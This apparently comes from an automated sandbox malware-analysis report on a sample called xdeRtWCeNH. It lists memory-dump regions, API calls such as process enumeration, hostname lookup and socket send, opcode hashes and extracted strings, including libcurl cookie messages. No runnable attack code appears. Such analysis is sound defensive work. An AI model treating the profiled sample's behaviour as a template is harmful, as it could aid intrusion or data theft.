                                                            • Source File: 00000000.00000002.1597497521.0000000007470000.00000040.00001000.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7470000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            APIs
                                                            • gethostname.WS2_32(00000000,00000040), ref: 00774AA4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1589659327.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6c0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: gethostname
                                                            • String ID:
                                                            • API String ID: 144339138-0
                                                            APIs
                                                            • Process32FirstW.KERNEL32(?,?,?,?), ref: 074603C1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597480286.0000000007460000.00000040.00001000.00020000.00000000.sdmp, Offset: 07460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7460000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            APIs
                                                            • Process32FirstW.KERNEL32(?,?,?,?), ref: 074603C1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597480286.0000000007460000.00000040.00001000.00020000.00000000.sdmp, Offset: 07460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7460000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            APIs
                                                            • Process32FirstW.KERNEL32(?,?,?,?), ref: 074603C1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597480286.0000000007460000.00000040.00001000.00020000.00000000.sdmp, Offset: 07460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7460000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            APIs
                                                            • Process32FirstW.KERNEL32(?,?,?,?), ref: 074603C1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597480286.0000000007460000.00000040.00001000.00020000.00000000.sdmp, Offset: 07460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7460000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            APIs
                                                            • Process32FirstW.KERNEL32(?,?,?,?), ref: 074603C1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597480286.0000000007460000.00000040.00001000.00020000.00000000.sdmp, Offset: 07460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7460000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            APIs
                                                            • Process32FirstW.KERNEL32(?,?,?,?), ref: 074603C1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597480286.0000000007460000.00000040.00001000.00020000.00000000.sdmp, Offset: 07460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7460000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            APIs
                                                            • getsockname.WS2_32(?,?,00000080), ref: 0078AFD1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1589659327.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6c0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: getsockname
                                                            • String ID:
                                                            • API String ID: 3358416759-0
                                                            APIs
                                                            • send.WS2_32(?,?,?,00000000,00000000,?), ref: 0078A97E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1589659327.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6c0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: send
                                                            • String ID:
                                                            • API String ID: 2809346765-0
                                                            APIs
                                                            • socket.WS2_32(?,0078B280,00000000,-00000001,00000000,0078B280,?,?,00000002,00000011,?,?,00000000,0000000B,?,?), ref: 0078AF67
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1589659327.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6c0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: socket
                                                            • String ID:
                                                            • API String ID: 98920635-0
                                                            APIs
                                                            • closesocket.WS2_32(?,00789422,?,?,?,?,?,?,?,?,?,?,?,w3w,00B54C60,00000000), ref: 0078B04D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1589659327.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6c0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: closesocket
                                                            • String ID:
                                                            • API String ID: 2781271927-0
                                                            APIs
                                                            • ioctlsocket.WS2_32(?,8004667E,?,?,006FAF56,?,00000001), ref: 007267FC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1589659327.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6c0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: ioctlsocket
                                                            • String ID:
                                                            • API String ID: 3577187118-0
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1589659327.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6c0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: CloseHandle
                                                            • String ID:
                                                            • API String ID: 2962429428-0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597554954.00000000074A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_74a0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: QZaZXj
                                                            • API String ID: 0-956811649
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597554954.00000000074A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_74a0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: QZaZXj
                                                            • API String ID: 0-956811649
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597554954.00000000074A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_74a0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: QZaZXj
                                                            • API String ID: 0-956811649
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1589659327.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6c0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID:
                                                            • API String ID: 3472027048-0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597137828.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7400000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597137828.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7400000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597137828.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7400000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597137828.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7400000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597137828.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7400000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597137828.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7400000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597137828.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7400000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597137828.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7400000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597137828.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7400000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e22823a2af0fa860aa2178166067df75531e2eb5484b68720511d8366c224156
                                                            • Instruction ID: a8791db8c0ae99aeb5276f56c87a25fa439891c5ce8504592c9550504737df97
                                                            • Opcode Fuzzy Hash: e22823a2af0fa860aa2178166067df75531e2eb5484b68720511d8366c224156
                                                            • Instruction Fuzzy Hash: CC31F4EB01D154BCB20695511B10BFA6B6EEAC3230B308C37F807D51A2D2B85B4B52F1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597137828.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7400000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5c6dd8ee26a88ec96b75a63a149f0dffe8f291a112800afd40ee1655d4d6e7d5
                                                            • Instruction ID: 1bfd83e413600f57efd50a8ff9d1d6181d3871272998b50d64179e12ff71ab5c
                                                            • Opcode Fuzzy Hash: 5c6dd8ee26a88ec96b75a63a149f0dffe8f291a112800afd40ee1655d4d6e7d5
                                                            • Instruction Fuzzy Hash: F331A0EB02D118BCB25595812B54BFA676EE6D7330F308C37F807E55A2E2B85B4B11B1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597137828.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7400000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f8fc424402cf24df294a0eeb1d121dd5217389e07f6f2f666e6176100808264f
                                                            • Instruction ID: f3ce724f5042afb81d27e4f4ccd453062bbd12a9e2e10d2d760b7b28b8c44cb2
                                                            • Opcode Fuzzy Hash: f8fc424402cf24df294a0eeb1d121dd5217389e07f6f2f666e6176100808264f
                                                            • Instruction Fuzzy Hash: CF31A3EB01C118BCB25595415B54BFA676EE6D7330B308C37F807E55A2E2B85B4B11F1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597137828.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7400000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b025064c0eaa7427e93c5140244975bec002e0fad96dd661b73927f0fe08d215
                                                            • Instruction ID: 0d108dddd8606145656ae60a1f2f8af0e75d3f9666fd69559efcddca82e8af1d
                                                            • Opcode Fuzzy Hash: b025064c0eaa7427e93c5140244975bec002e0fad96dd661b73927f0fe08d215
                                                            • Instruction Fuzzy Hash: A131C0EB01C118BDB25595415B50BFBA76EEAC7330B308C37F807E52A2E2B49B4B11B1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597137828.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7400000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a975558f826ae70f60c078c4bf11e02ece5dfa3243efcaa747a677b46d3064e9
                                                            • Instruction ID: 797e6283c559c2fa4630a92a2f8544bb72c2b16142c20964b19096d1276a3bae
                                                            • Opcode Fuzzy Hash: a975558f826ae70f60c078c4bf11e02ece5dfa3243efcaa747a677b46d3064e9
                                                            • Instruction Fuzzy Hash: 5E31D2EB01D159BDB252D5415B54BFA6B6EEAC3730B308C37F807E51A2E2A84E4B11B1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597137828.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7400000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4668c30ccd2ea2475366671fa04911cce401ad2503e6c32f88018a8b34517527
                                                            • Instruction ID: f0a71ca183a036b5d72b71cba48421f3b7fdf8873b9b79931640590fffa178dd
                                                            • Opcode Fuzzy Hash: 4668c30ccd2ea2475366671fa04911cce401ad2503e6c32f88018a8b34517527
                                                            • Instruction Fuzzy Hash: DF31D2EB01D154BDB24195415B50BFB676EEAC7330F308C37F807E51A2E2B45A4B11B1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597137828.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7400000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1257dd87715f338caa654279050ebe2dcf1a849132781644c97b9648f09dab5c
                                                            • Instruction ID: 63ac8fa2b04059f3fd9d6a308c3c7d54717f1ed3d3c2eeec2066cff9a410f904
                                                            • Opcode Fuzzy Hash: 1257dd87715f338caa654279050ebe2dcf1a849132781644c97b9648f09dab5c
                                                            • Instruction Fuzzy Hash: 6B31EEEA11C118BDB21195412B04BFB672EEAC3730B308837F817E51A2D2B89A4B11F1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597137828.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7400000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 12287af709ecfb1cd123e99e06e62d817ad1c319d48dee523e6ff4b4db05ba27
                                                            • Instruction ID: e23cfe40fe43470b2d9f6cb938304b0deeff89e559f5dc7df84f875220d8e07f
                                                            • Opcode Fuzzy Hash: 12287af709ecfb1cd123e99e06e62d817ad1c319d48dee523e6ff4b4db05ba27
                                                            • Instruction Fuzzy Hash: 0431B0EB01C118BDB241D5812B54BFA6B6EEAC7330B308C37F807E51A2D2A45F4B11B1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597137828.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7400000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c6778a8aba5a3fc3a2af02abaf1b411c91c4899b32595c8f11e136ca62a66cd7
                                                            • Instruction ID: 2c79c04b74afc52af9155a1467213adbaabe9b7dc20795882404feb31d3327d2
                                                            • Opcode Fuzzy Hash: c6778a8aba5a3fc3a2af02abaf1b411c91c4899b32595c8f11e136ca62a66cd7
                                                            • Instruction Fuzzy Hash: 6E31C0EB11D154BDB24295412B14BFA6B2EEAC3330B318C37F807E55A2D2B49E8F51B1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597137828.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7400000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2391fe7f5b35f0bea11809658c1d3fd23cfc667f0f9520215c3efb6fabca14bd
                                                            • Instruction ID: 3b4048b5b15650591836a708f7a41fe33a4bfc9e83fd507d7e530ec89bfc8819
                                                            • Opcode Fuzzy Hash: 2391fe7f5b35f0bea11809658c1d3fd23cfc667f0f9520215c3efb6fabca14bd
                                                            • Instruction Fuzzy Hash: 4421DDEB11D118BDA211A5812B14BFB676EE6C3730B318C37F803E5492E2B85E4B51B1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597137828.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7400000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e35b692a59d26391bb53dabe032b2e981b3f36f48c7c324451ab2ce014c46577
                                                            • Instruction ID: 5d479a904c39b81cdc07c898716e6bd93f9229bf0c52b9f3219f2afd6a8c8ab6
                                                            • Opcode Fuzzy Hash: e35b692a59d26391bb53dabe032b2e981b3f36f48c7c324451ab2ce014c46577
                                                            • Instruction Fuzzy Hash: 9E21E2EB11D159BCB24195412B54BFA672EEAC3330B308C37F817E45A2E2B89E4B11F1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597137828.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7400000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6f00e861d0a79e8a88b819a3237ba1a0700f4daac769bafa7fc2c5080e368275
                                                            • Instruction ID: f82328909519a7ce49eb80e9a5a72179d9636ead4e650f0e55b400ea9a03420f
                                                            • Opcode Fuzzy Hash: 6f00e861d0a79e8a88b819a3237ba1a0700f4daac769bafa7fc2c5080e368275
                                                            • Instruction Fuzzy Hash: B211D1F711D118BDA201D5502B50BFA672AE6C7330B318C37F803E50A2D2B45E4A52F1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597137828.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7400000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5b77e6489ed53eafc759716822991e8c0f8c21c5a89834d4a297d89cf2a5e00d
                                                            • Instruction ID: 21af0223b7790c9640b6b35f7c964082f7f005a9780c6c0090a39ae619f9b542
                                                            • Opcode Fuzzy Hash: 5b77e6489ed53eafc759716822991e8c0f8c21c5a89834d4a297d89cf2a5e00d
                                                            • Instruction Fuzzy Hash: 9E2134F700C158EDA201D5501A50BFB272AEAC3330B318C3BF802E51A2C2745E4B42F2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597137828.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7400000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2c5aeba5ec371ef5898c5f6e332f136897df39e1f97512ce1281bbda56acb911
                                                            • Instruction ID: 2180a67b38900c94180306aee4d0a48439aef9ba4db4f92bfda0d677b0223812
                                                            • Opcode Fuzzy Hash: 2c5aeba5ec371ef5898c5f6e332f136897df39e1f97512ce1281bbda56acb911
                                                            • Instruction Fuzzy Hash: CF11DFF711D158BDA241D5511A50BFB272AEAC7330F318C7BF806E51A2D2784E4B52F2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597137828.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7400000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: be31cc3cfeb561c85003a40eda37e303f77a57b3ba3b0f0526286e919286f929
                                                            • Instruction ID: b0f5706eaf800d935188b33f754158bd6a2bda635b08923005f10183ef75cfc1
                                                            • Opcode Fuzzy Hash: be31cc3cfeb561c85003a40eda37e303f77a57b3ba3b0f0526286e919286f929
                                                            • Instruction Fuzzy Hash: 590126E301D15CFCA24294901B407FA6B1AE6C3330F308C77E807A41A2D1B84E4741F1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597554954.00000000074A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_74a0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f70b939b1e36f3279fbaa919798360f7776236772f96d73433155342797b6d39
                                                            • Instruction ID: 6ed6283dd3874bb67ddc212dcfa4513e1d555608293f062714ba22aa4bfe3662
                                                            • Opcode Fuzzy Hash: f70b939b1e36f3279fbaa919798360f7776236772f96d73433155342797b6d39
                                                            • Instruction Fuzzy Hash: 58D0C2A101C68AFFCF4226B849A22E99F540A2B304F011A17A942BB0F7B19110824082
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597554954.00000000074A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_74a0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a23040424217668d1fdf26b7637b7a408dd1052ecd328076f75873015868a75d
                                                            • Instruction ID: b4d6eb090caa660e64b0ff5246bb82a35a35c95075e803225e001f617ad302fd
                                                            • Opcode Fuzzy Hash: a23040424217668d1fdf26b7637b7a408dd1052ecd328076f75873015868a75d
                                                            • Instruction Fuzzy Hash: EDD0A7F051D5C5FA8B820A9094C08F83B318D2B208B0009D6E5512D474A26201638642
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597554954.00000000074A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_74a0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 801f77fcf08a0d17212d11887df423e9ad7e8b280abdad479368004730bad7b4
                                                            • Instruction ID: 49b249c9f65d967fcd8cc05a3689f0dbb125df6bd6fd385d711a0ddf5c1f8422
                                                            • Opcode Fuzzy Hash: 801f77fcf08a0d17212d11887df423e9ad7e8b280abdad479368004730bad7b4
                                                            • Instruction Fuzzy Hash: 99C02BF137C607FD8B8A0D1C82E0AF819133A73300F158E17B903B44BCB2E1045B0881
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597554954.00000000074A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_74a0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 22f6b51abd6b84bbba80abf8ac3e828d3ffd96afd74318d46db26a3fc042ff23
                                                            • Instruction ID: 5cc0a2829c8873e6b1ee3490620ddeefab8b3954af329c0cf5be9b10e500c470
                                                            • Opcode Fuzzy Hash: 22f6b51abd6b84bbba80abf8ac3e828d3ffd96afd74318d46db26a3fc042ff23
                                                            • Instruction Fuzzy Hash: 1DC02B8245C2439082D0041056C09F82780B0970341142B97E2F3183F0D24301034140
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1589659327.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                            • Associated: 00000000.00000002.1589596663.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1589659327.0000000000C31000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1589659327.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1589659327.0000000000D99000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590456887.0000000000D9C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590510204.0000000000D9E000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590510204.0000000000F24000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590510204.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590510204.0000000001031000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590510204.0000000001111000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590510204.000000000111C000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590510204.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590876158.000000000112B000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590987294.00000000012DC000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1591004957.00000000012DE000.00000080.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6c0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: #HttpOnly_$%s cookie %s="%s" for domain %s, path %s, expire %lld$;=$;$=$Added$FALSE$Replaced$TRUE$__Host-$__Secure-$cookie '%s' dropped, domain '%s' must not set cookies for '%s'$cookie '%s' for domain '%s' dropped, would overlay an existing cookie$cookie contains TAB, dropping$cookie.c$domain$expires$httponly$invalid octets in name/value, cookie dropped$libpsl problem, rejecting cookie for satety$max-age$oversized cookie dropped, name/val %zu + %zu bytes$path$secure$skipped cookie with bad tailmatch domain: %s$version
                                                            • API String ID: 0-1371176463
                                                            • Opcode ID: f66b9388b79e1c5be0564116b794aa1948afb4f18a0350bfbca677ecab764c4c
                                                            • Instruction ID: f93889f9e79df5e30892b71fdeed698d5e48cc52561d775e8c8e25aae5971806
